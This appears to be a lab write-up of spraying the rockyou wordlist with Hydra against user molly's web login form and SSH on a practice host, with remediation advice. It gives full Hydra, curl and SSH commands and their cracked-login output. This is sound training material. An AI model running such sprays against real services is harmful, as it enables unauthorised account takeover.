Hydra HTTP-POST form and SSH password spray for Molly
Foundations network engagement: Hydra sprayed rockyou against Molly’s web login and SSH; both surfaces fell to weak passwords and yielded distinct engagement artifacts.
- Case files
- Hydra HTTP-POST form and SSH password spray for Molly
http-post-form module cracked Molly’s web password; ssh module cracked her SSH password; both secrets were in rockyou.
Hydra http-post-form against /login/ recovered Molly’s web password from rockyou.
Hydra ssh module recovered Molly’s SSH password; authenticated shell confirmed second artifact.
Engagement summary
http-post-form module cracked Molly’s web password; ssh module cracked her SSH password; both secrets were in rockyou.
HYDRA tested credential spraying against a dual-surface host: a web login form and OpenSSH for user molly. With rockyou and fifty parallel tasks, hydra’s http-post-form module targeted /login/ with username/password fields and failure string incorrect — recovering the web password and the first artifact. The same username and wordlist against ssh:// recovered a second password and SSH access. No MFA, no lockout, shared weak dictionary passwords across channels.
Business impact
Identical weak passwords on web and SSH multiply exposure. Without rate limits or account lockout, dictionary sprays succeed in minutes. Enforce unique strong secrets per service, MFA on remote access, and alert on distributed auth failures.
HTTP POST form spray
Hydra http-post-form against /login/ recovered Molly’s web password from rockyou.
OPERATOR · HYDRA WEB
savvy@lab:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login/:username=^USER^&password=^PASS^:F=incorrect" -t 50
[80][http-post-form] host: 10.10.10.10 login: molly password: ********
savvy@lab:~$ curl -s -X POST http://10.10.10.10/login/ -d 'username=molly&password=********'
authenticated — web flag recovered
HYDRA MODULE
hydra-http-post.txt
hydra -l USER -P WORDLIST TARGET \
http-post-form "/path/:user=^USER^&pass=^PASS^:F=fail_string" -t 16SSH password spray
Hydra ssh module recovered Molly’s SSH password; authenticated shell confirmed second artifact.
OPERATOR · HYDRA SSH
savvy@lab:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10 -t 50
[22][ssh] host: 10.10.10.10 login: molly password: ********
savvy@lab:~$ ssh molly@10.10.10.10
molly@10.10.10.10's password: ******** savvy@lab:~$ cat ~/flag.txt
Remediation
Disable password SSH where possible; mandate keys and MFA. On web forms, progressive delays, CAPTCHA after N failures, and monitoring for hydra-like parallel attempt patterns. Ban rockyou and other breach corpora at password set time.